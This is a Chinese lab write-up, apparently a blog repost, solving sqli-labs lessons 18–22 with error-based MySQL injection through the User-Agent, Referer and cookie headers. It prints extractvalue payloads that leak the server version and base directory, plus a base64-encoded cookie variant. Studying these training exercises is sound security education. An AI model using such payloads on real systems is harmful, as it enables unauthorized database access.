【20171031中】sqli-libs Less 18-22

时间：2017-10-31 19:36:50 阅读：277 评论：0 收藏：0 [点我收藏+]

Less 18：

　　题目：

技术分享

　　分析：随便输入username和password，页面显示user agent的信息，提示我们通过修改http headers中的user-agent进行注入。

　　TRY：

　　　　工具：firefox, live http headers

　　　　s1：打开live http headers，并重新提交，live http headers显示如下

技术分享

　　s2：点击Replay...，弹出新对话框，将User-Agent内容修改为：‘and extractvalue(1, concat(0x7e,(select @@version),0x7e)) and ‘1‘=‘1，当然闭合条件和以往的测试方式一致。

技术分享

　　s3：点击Repaly，重新查看网页，显示如下：暴露了系统的版本，其他信息只需要构造sql就OK了！

技术分享

Less 19：

　　分析这题和Less 18类似，这次要修改的是http headers中的Referer，如果你们的Live http headers中没有referer，你可以自己写一条。

　　payload：‘and extractvalue(1, concat(0x7e,(select @@basedir),0x7e)) and ‘1‘=‘1

Less 20：

　　题目：

技术分享

　　分析：cookie注入

　　TRY：

　　　　工具：Tamper Data，firefox

　　　　s1：打开Tamper Data，开启Tamper选项，重新载入这个页面，再看Tamper内容，就变成如下：

技术分享

　　　　s2：修改cookie值，

　　　　　　payload：admin‘ and extractvalue(1, concat(0x7e,(select @@version),0x7e))#

　　　　　　点击确定，再看页面

技术分享

Less 21：

　　和Less 20类似，payload：admin‘) and extractvalue(1, concat(0x7e,(select @@version),0x7e))#，闭合方式不同，这次是 ‘)

Less 22：

　　和Less 20类似，payload是admin" and extractvalue(1, concat(0x7e,(select @@version),0x7e))#的base64加密后结果：YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSwgY29uY2F0KDB4N2UsKHNlbGVjdCBAQHZlcnNpb24pLDB4N2UpKSM=

　　TRY：

　　技术分享

【20171031中】sqli-libs Less 18-22

原文：http://www.cnblogs.com/heijuelou/p/7763061.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)